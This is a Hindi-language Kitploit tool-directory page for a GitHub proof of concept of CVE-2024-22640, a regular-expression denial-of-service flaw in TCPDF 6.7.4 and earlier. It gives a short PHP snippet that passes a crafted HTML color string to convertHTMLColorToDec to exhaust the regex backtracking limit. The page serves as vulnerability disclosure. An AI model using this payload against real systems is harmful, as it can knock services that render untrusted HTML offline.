Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-22640 — प्रमाण-अवधारणा शोषण CVE-2024-22640 के लिए, TCPDF <=6.7.4 में एक ReDoS भेद्यता जो विशेष रूप से तैयार किए गए HTML रंग इनपुट द्वारा ट्रिगर होती है, प्रदर्शन कोड के साथ। | Kitploit
उपकरण/GitHubGitHub/zunak/cve-2024-22640
स्थैतिक विश्लेषणभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब सुरक्षाफज़िंग
GitHubzunak/cve-2024-22640

CVE-2024-22640

प्रमाण-अवधारणा शोषण CVE-2024-22640 के लिए, TCPDF <=6.7.4 में एक ReDoS भेद्यता जो विशेष रूप से तैयार किए गए HTML रंग इनपुट द्वारा ट्रिगर होती है, प्रदर्शन कोड के साथ।

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-22640

भेद्यता प्रकार

रेगुलर एक्सप्रेशन डेनियल ऑफ सर्विस (ReDoS)

प्रभावित उत्पाद और संस्करण

TCPDF <= 6.7.4

हमला वेक्टर

TCPDF द्वारा पार्स किए गए HTML रंग में क्राफ्टेड पेलोड होता है।

विवरण

TCPDF संस्करण <= 6.7.4, एक अविश्वसनीय HTML पेज को क्राफ्टेड रंग के साथ पार्स करने पर ReDoS (रेगुलर एक्सप्रेशन डेनियल ऑफ सर्विस) के लिए संवेदनशील है।

PoC

root@kitploit:~
<?php

require_once('../tcpdf.php');

$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>

नोट: भेद्य रेखा के बाद preg_last_error() से जांच करने पर, regEx PREG_BACKTRACK_LIMIT_ERROR के साथ बाहर निकलेगा।

टूल डाउनलोड करें